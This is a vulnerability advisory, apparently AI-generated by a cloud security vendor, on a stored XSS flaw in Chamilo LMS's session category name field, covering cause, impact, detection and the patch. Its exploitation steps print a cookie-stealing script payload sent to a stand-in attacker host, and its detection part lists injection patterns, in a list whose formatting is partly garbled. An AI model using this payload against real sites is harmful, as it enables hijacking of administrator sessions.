
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-52470 is a stored cross-site scripting (XSS) vulnerability in Chamilo LMS affecting versions up to and including 1.11.28. The flaw exists in the session_category_add.php script, where the Category Name field is not properly sanitized before being stored and later rendered in add_many_sessions_to_category.php. It was disclosed on March 2, 2026, and patched in version 1.11.30. The vulnerability carries a CVSS v3.1 base score of 4.8 (Medium) (GitHub Advisory, Red Hat CVE).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS pattern where user-supplied input in the Category Name field is written to the database without HTML encoding or JavaScript filtering (GitHub Advisory). The vulnerable code path is in sessionmanager.lib.php, where the create_category_session() function previously only applied Database::escape_string() — which prevents SQL injection but does not strip HTML/JavaScript — before storing the value. The stored payload is later rendered unescaped when any privileged user loads add_many_sessions_to_category.php, triggering execution in their browser context. The fix applied html_filter(), RemoveOnAttributes::filter(), and Security::remove_XSS() at both storage and retrieval points (GitHub Commit).
Successful exploitation allows an attacker with administrative privileges to inject persistent JavaScript that executes in the browser sessions of other privileged users who visit add_many_sessions_to_category.php. This can lead to session hijacking of other administrators, unauthorized actions within the admin interface (such as user management or course manipulation), and exfiltration of sensitive session tokens or data. In multi-admin environments, the attack can escalate internally, enabling one compromised or malicious admin to compromise other admin accounts (GitHub Advisory).
Exploitation requires the attacker to already hold administrative (privileged) credentials within Chamilo LMS, and a victim administrator must subsequently visit the affected page — making this a high-privilege, user-interaction-dependent attack. A proof-of-concept is referenced in the GitHub Security Advisory, but there is no evidence of active in-the-wild exploitation at this time (GitHub Advisory). The EPSS score is approximately 0.026%, reflecting low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
session_category_add.php page in the Chamilo admin interface.<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant.add_many_sessions_to_category.php, the stored payload is rendered and executes in their browser.add_many_sessions_to_category.php; unusual GET/POST requests containing encoded cookie or session data to attacker-controlled infrastructure.session_category_add.php with Category Name parameters containing HTML tags, <script> strings, or JavaScript event handlers (e.g., onerror=, onload=); access logs showing add_many_sessions_to_category.php loaded by multiple admin accounts in close succession.SELECT name FROM session_category WHERE name LIKE '%<script%' OR name LIKE '%on%=%').The primary remediation is to upgrade Chamilo LMS to version 1.11.30 or later, which applies proper input sanitization (html_filter(), RemoveOnAttributes::filter(), and Security::remove_XSS()) to the Category Name field at both storage and retrieval (GitHub Release, GitHub Commit). For organizations unable to patch immediately, restrict access to session category management functions to only the most trusted administrators, and implement a Web Application Firewall (WAF) to filter script-injection patterns in form inputs. Enforcing a strict Content Security Policy (CSP) header can also reduce the impact of any successful XSS execution.
The vulnerability was reported by researcher NaklehZeidan21 and remediated by AngelFQC, as credited in the GitHub Security Advisory. No significant broader media coverage or notable public researcher commentary beyond the official advisory has been identified (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."